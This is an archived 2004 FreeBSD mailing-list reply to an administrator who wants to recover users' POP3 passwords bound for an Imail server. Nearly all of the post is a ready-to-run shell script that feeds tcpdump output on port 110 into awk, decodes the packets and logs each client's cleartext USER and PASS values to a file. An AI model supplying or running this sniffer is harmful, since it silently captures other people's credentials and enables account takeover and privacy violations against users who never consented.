tcpdump for sniffing POP3 -- methods ?
freebsd-lists at albury.net.au
freebsd-lists at albury.net.au
Tue Apr 13 13:10:58 PDT 2004
On Tue, 13 Apr 2004, John Fox wrote:
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.
I had to do this some years back, here's the rude, crude and unattractive
script I wrote then:
# cat sniff.pop.passwords
#! /bin/sh
log=sniffed.passwords.log
mailhost="mail" # Hostname of whichever host receives your incomming mail
tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
BEGIN{ lut="123456789abcdef" }
/>/ { IP=$2; n=0; len=0; c=""; }
{
if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
if(++n>3 && len>20)
{
for(i=(n==4)*4+1; i<=NF; i++)
c=sprintf("%s%c%c",c,
index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
if(length(c) >= len-40)
{
sub("\.[0-9]*$","",IP);
v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
if(substr(c,1,5)=="USER ") usr[IP]=v;
if(substr(c,1,5)=="PASS " && usr[IP]) {
printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
usr[IP]=""
}
}
}
}'
More information about the freebsd-isp
mailing list